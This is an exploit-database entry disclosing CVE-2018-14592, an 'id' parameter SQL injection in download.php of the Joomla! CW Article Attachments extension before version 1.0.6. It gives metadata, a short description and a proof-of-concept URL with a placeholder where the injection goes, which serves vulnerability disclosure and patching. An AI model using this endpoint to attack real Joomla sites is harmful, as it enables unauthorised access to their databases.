Joomla! Component CW Article Attachments 1.0.6 - 'id' SQL Injection

Author: Haboob Team
type: webapps
platform: php
port: 80.0
date_added: 2018-09-24  
date_updated: 2018-09-24  
verified: 0  
codes: CVE-2018-14592  
tags: SQL Injection (SQLi)  
aliases:   
screenshot_url:   
application_url:   

raw file: 45447.txt  

# Exploit Title: Joomla! CW Article Attachments 1.0.6 - 'id' SQL Injection
# Date: 2018-09-20
# Exploit Author: Haboob Team
# Software Link: https://extensions.joomla.org/extension/cw-article-attachments/
# Version: below < 1.0.6
# CVE : CVE-2018-14592
# https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14592

# 1. Description
# The CWJoomla CW Article Attachments PRO extension before 2.0.7 and CW Article Attachments
# FREE extension before 1.0.6 for Joomla! allow SQL Injection within download.php.

# 2. Proof of Concept

http://IP-ADDRESS/plugins/content/cwattachments/cwattachments/helpers/download.php?id=INJECTION&sid=0123456789987654321